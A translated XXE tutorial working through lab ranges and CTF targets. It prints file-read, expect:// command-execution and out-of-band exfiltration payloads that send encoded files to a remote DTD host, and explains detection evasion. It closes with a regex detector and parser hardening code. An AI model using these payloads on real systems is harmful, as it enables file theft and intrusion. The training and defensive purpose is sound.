39 WEB Vulnerability-XXE&XML Exploit Detection Bypass Complete Solution

Directory

    • Involved cases
      • pikachu shooting range xml data transmission test-echo, gameplay, protocol, introduction
      • How to play – read files
      • How to play – Intranet probe or attack intranet application (trigger vulnerability address)
      • How to play-RCE
      • Introduce external entity dtd
      • No echo – reading file
      • Protocol – Read File (Bypass)
      • xxe-lab shooting range login box xml data transmission test-detection discovery
      • CTF-Jarvis-OJ-Web-XXE Security Real Question Reproduction-Data Request Format
      • xxe security vulnerability automated injection script tool-XXEinjector (Ruby)
      • CTF-Vulnhub-XXE Security Real Question Reproduction-Detection, Utilization, Expansion, and Practical Combat
      • xxe vulnerability repair and defense solution-php, java, python-filtering and disabling

Article sharing: https://www.cnblogs.com/zhengna/p/15740341.html

XML is designed to transmit and store data. An XML document consists of an XML declaration, an optional DTD (document type definition) and the document elements. Its focus is the content of the data: it separates the data from its presentation (HTML) and is a software- and hardware-independent information transfer format. XXE stands for XML External Entity Injection, an xml external entity injection vulnerability. The XXE vulnerability occurs when the application parses XML input and does not prohibit the loading of external entities. As a result, malicious external files can be loaded, causing file reading, command execution, intranet port scanning, attacks on intranet websites and other hazards. The harm is somewhat similar to that of an ssrf vulnerability.

Key differences between XML and HTML
XML is designed to transport and store data, with the focus being the content of the data.
HTML was designed to display data, with the focus being on the appearance of the data.
HTML is designed to display information, while XML is designed to transmit information.

<!--XML declaration-->
<?xml version="1.0"?>
<!--Document type definition-->
<!DOCTYPE note [ <!--Define this document to be a note type document-->
<!ELEMENT note (to,from,head,body)> <!--Define the note element to have four child elements-->
<!ELEMENT to (#PCDATA)> <!--Define the to element as the "#PCDATA" type-->
<!ELEMENT from (#PCDATA)> <!--Define the from element as the "#PCDATA" type-->
<!ELEMENT head (#PCDATA)> <!--Define the head element as the "#PCDATA" type-->
<!ELEMENT body (#PCDATA)> <!--Define the body element as the "#PCDATA" type-->
]>
<!--Document elements-->
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

#DTD
A document type definition (DTD) defines the legal building blocks of an XML document.
It uses a series of legal elements to define the structure of the document.
A DTD can be declared inline in the XML document or as an external reference.
(1) Internal DOCTYPE declaration

(2) External document declaration

#DTD Entity
(1) Internal entity declaration

(2) External entity declaration

(3) Parameter entity declaration


Involved cases

Pikachu shooting range xml data transmission test-echo, gameplay, protocol, introduction

How to play – read files

<?xml version = "1.0"?>
<!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///d://test.txt">
]>
<x> &xxe;</x>

How to play-Intranet probe or attack intranet application (trigger vulnerability address)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.0.103:8081/index.txt" >
]>
<x> &rabbit;</x>

How to play-RCE

This CASE is to execute system commands in the PHP environment where the expect extension is installed.

<?xml version = "1.0"?>
<!DOCTYPE ANY [
     <!ENTITY xxe SYSTEM "expect://id">
]>
<x> &xxe;</x>

In real-world engagements this situation is rarely encountered, so commands usually cannot be executed this way.

Introducing external entity dtd

<?xml version="1.0" ?>
<!DOCTYPE test [
     <!ENTITY % file SYSTEM "http://127.0.0.1:8081/evil2.dtd">
     %file;
]>
<x>&send;</x>
evil2.dtd:
<!ENTITY send SYSTEM "file:///d:/test.txt">

If the other side allows external entities, the parser can be made to load a remote entity and run the relevant attack code. This is similar to the distinction between local inclusion and remote inclusion in file inclusion vulnerabilities: referencing an external entity dtd file works on much the same principle as remote inclusion.
Custom attack code is used to bypass some remote defences. If the other side runs detection and defence software, it tracks user behaviour, notices that you are reading this file and intercepts it, or it analyses the code and intercepts on a key protocol name or similar concept. In that case you put your core code in the remote dtd, and the payload only requests that dtd remotely and executes the core code.
The application scenario is bypassing defences and carrying out customised attacks: when you want to change the attack, just change the dtd file.

No echo – read file

<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=d:/test.txt">
<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">
%dtd;
%send;
]>

test.dtd:
<!ENTITY % payload
    "<!ENTITY &#x25; send SYSTEM 'http://192.168.0.103:8081/?data=%file;'>"
>
%payload;

Without echo we would not know what was read, so a plain read on its own is meaningless.
The file parameter entity reads the specified content; once read, its value is substituted into the send entity declared in the dtd, and the code in the dtd is executed.

Protocol-Read File (Bypass)

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<x> &f;</x>

There are many dictionaries on the Internet about the payload of xxe attacks.

xxe-lab shooting range login box xml data transmission test-detection discovery

1. The submitted data is in XML format, for example:
admin
2. The request header includes:

Content-Type: text/xml or Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE Mikasa [
<!ENTITY test SYSTEM "file:///d:/test.txt">
]>
<user><username>&test;</username><password>Mikasa</password></user>

The xxe scanning tool is also available online, but I haven’t tried the effect.

The main approach is to crawl data packets. We use BP (Burp Suite) to capture packets; BP has a crawling function that can crawl the entire website and collect every address request. After crawling, we run a batch search over every captured packet for the Content-Type value. If text/xml or application/xml is found there, the data that follows is transmitted in the XML format, the receiving side accepts XML, and the vulnerability can be tried.
The format of the transmitted data is then the typical way of writing XML code.
Blind guessing: not seeing XML does not mean it is not accepted. The code may handle XML normally while the packet simply does not show it. In that case you can try changing the type to text/xml or application/xml and then write the attack statement into the data to test whether there is an xxe vulnerability. This is the conventional manual operation for testing whether the vulnerability exists.
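An added detection example (not from the original page) that applies the Content-Type filter described above and then flags the DTD features the payloads in this article rely on; the request samples are constructed and the indicator names are my own:

```python
import re

# Constructed sample requests (not from the original page) as (headers, body) pairs,
# the shape a proxy capture yields after the Content-Type search described above.
SAMPLE_REQUESTS = [
    ({"Content-Type": "application/json"}, '{"username": "admin", "password": "x"}'),
    ({"Content-Type": "text/xml"},
     '<?xml version="1.0"?><user><username>admin</username><password>x</password></user>'),
    ({"Content-Type": "application/xml"},
     '<?xml version="1.0"?><!DOCTYPE Mikasa [<!ENTITY test SYSTEM "file:///d:/test.txt">]>'
     '<user><username>&test;</username><password>Mikasa</password></user>'),
    ({"Content-Type": "text/xml"},
     '<?xml version="1.0"?><!DOCTYPE test [<!ENTITY % file SYSTEM '
     '"php://filter/read=convert.base64-encode/resource=d:/test.txt">'
     '<!ENTITY % dtd SYSTEM "http://192.168.0.103:8081/test.dtd">%dtd;%send;]>'),
]

XML_TYPES = ("text/xml", "application/xml")

# (label, pattern). Case-insensitive because URI schemes are, and whitespace-tolerant
# because "<!ENTITY %file" and "<!ENTITY % file" are both accepted by parsers.
INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE\b", re.I)),
    ("external-entity", re.compile(r"<!ENTITY\s+%?\s*\w+\s+(SYSTEM|PUBLIC)\b", re.I)),
    ("parameter-entity", re.compile(r"<!ENTITY\s+%", re.I)),
    ("dangerous-scheme", re.compile(r"\b(file|php|expect|gopher|jar|ftp)://", re.I)),
    ("http-fetch", re.compile(r"\bhttps?://", re.I)),
]

def is_xml_request(headers):
    """The first filter from the article: is the body declared as XML? (charset params ignored)"""
    ctype = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return ctype in XML_TYPES

def detect_xxe(headers, body):
    """Return the indicator labels found in an XML body; [] means plain XML or not XML."""
    if not is_xml_request(headers):
        return []
    return [label for label, pat in INDICATORS if pat.search(body)]
```

A legitimate API rarely needs a DOCTYPE at all, so the "doctype" label alone is a reasonable alert threshold; the remaining labels rank how far a request has gone towards the patterns in this article.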

Crawl the website

This writing style is typical XML and is consistent with testing for the existence of an xxe vulnerability; at this point we attack it and simply copy the payload directly.
Find the data packet that matches the conditions for the vulnerability, submit the data there, and submit our own payload for the attack.

When the data is submitted, its transmission form is JSON. This is where the blind guess comes in: we directly modify the Content-Type, because if you do not modify the packet's type, this XML writing method will not be recognised when the data is transmitted.

CTF-Jarvis-OJ-Web-XXE Security Real Question Reproduction-Data Request Format

http://web.jarvisoj.com:9882/
Change request data format: application/xml

<?xml version = "1.0"?>
<!DOCTYPE ANY [
     <!ENTITY f SYSTEM "file:///etc/passwd">
]>
<x> &f;</x>

Change the data format to that of the payload. The method mentioned before first determines whether the request conforms to the XML format; if it does, we then determine whether it has this vulnerability, so these are two different concepts.
Modifying the data packet in this way achieves blind guessing of xxe vulnerabilities.

xxe security vulnerability automated injection script tool-XXEinjector (Ruby)

How to use XXEinjector: https://www.cnblogs.com/bmjoker/p/9614990.html
XXEinjector detection tool: https://github.com/enjoiz/XXEinjector
xxe_payload_fuzz
From discovering the target address, to collecting the target's assets, to attacking the target's asset information and finding the corresponding vulnerabilities, the operations are carried out step by step.

CTF-Vulnhub-XXE Security Real Question Reproduction-Detection, Utilization, Expansion, and Practical Combat

Scan IP and port->Scan probe directory->Packet capture probe xxe security->Use xxe to read source code->flag points to the file->base32 64 unpack->php run->flag

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT Y ANY>
<!ENTITY sp SYSTEM "php://filter/read=convert.base64-encode/resource=admin.php">
]>
<root><name>&sp;</name><password>hj</password></root>

The overall difficulty of this target machine is still fairly high. It is not just a matter of finding a vulnerability and exploiting it; it makes you take some detours along the way.

xxe vulnerability repair and defense solution-php, java, python-filtering and disabling

#Option 1 – Disable external entities
PHP:
libxml_disable_entity_loader(true);

JAVA:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setExpandEntityReferences(false);

Python:
from lxml import etree
xmlData = etree.parse(xmlsource, etree.XMLParser(resolve_entities=False))

#Option 2-Filter XML data submitted by users
Filter keywords:

The root cause of the XXE vulnerability is that the website receives xml data. XML is itself a language: the website receives xml data without filtering it, so we can make it accept some xml code, and this code performs the file read. The operation is essentially the same idea as the injection we discussed before, json injection and deserialization, which are all data format issues.
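An added example of Option 1 for the xxe-lab login format above, using only Python's standard-library expat parser (not code from the original page or from xxe-lab): any DOCTYPE is refused before its internal subset is read, so no entity can be declared or resolved at all. The sample documents are constructed.

```python
import xml.parsers.expat

# Constructed samples in the xxe-lab login format (not from the original page).
BENIGN = b'<?xml version="1.0"?><user><username>admin</username><password>Mikasa</password></user>'
WITH_DTD = (b'<?xml version="1.0"?><!DOCTYPE Mikasa [<!ENTITY test SYSTEM "file:///d:/test.txt">]>'
            b'<user><username>&test;</username><password>Mikasa</password></user>')

class UnsafeXMLError(ValueError):
    """Document carries a DOCTYPE, an entity declaration, an external reference, or is malformed."""

def parse_login_xml(data: bytes) -> dict:
    """Extract username and password; reject the whole DTD mechanism instead of
    trusting per-feature parser flags. Handlers raise, which aborts the parse."""
    fields, stack = {}, []
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError("DOCTYPE declarations are not accepted")
    def reject_entity(*decl):  # belt and braces: unreachable once DOCTYPE is refused
        raise UnsafeXMLError("entity declarations are not accepted")
    def reject_external(context, base, system_id, public_id):
        return 0  # expat treats 0 as failure and stops; the resource is never fetched
    def start(name, attrs):
        stack.append(name)
        if name in ("username", "password"):
            fields[name] = ""
    def chars(text):
        if stack and stack[-1] in fields:
            fields[stack[-1]] += text  # expat may deliver text in several chunks
    p = xml.parsers.expat.ParserCreate()
    p.StartDoctypeDeclHandler = reject_doctype
    p.EntityDeclHandler = reject_entity
    p.ExternalEntityRefHandler = reject_external
    p.StartElementHandler = start
    p.EndElementHandler = lambda name: stack.pop()
    p.CharacterDataHandler = chars
    try:
        p.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise UnsafeXMLError(f"malformed XML: {exc}") from exc
    if set(fields) != {"username", "password"}:
        raise UnsafeXMLError("missing username or password element")
    return fields

def is_accepted(data: bytes) -> bool:
    """Request gate: True only for a well-formed, DTD-free login document."""
    try:
        parse_login_xml(data)
        return True
    except UnsafeXMLError:
        return False
```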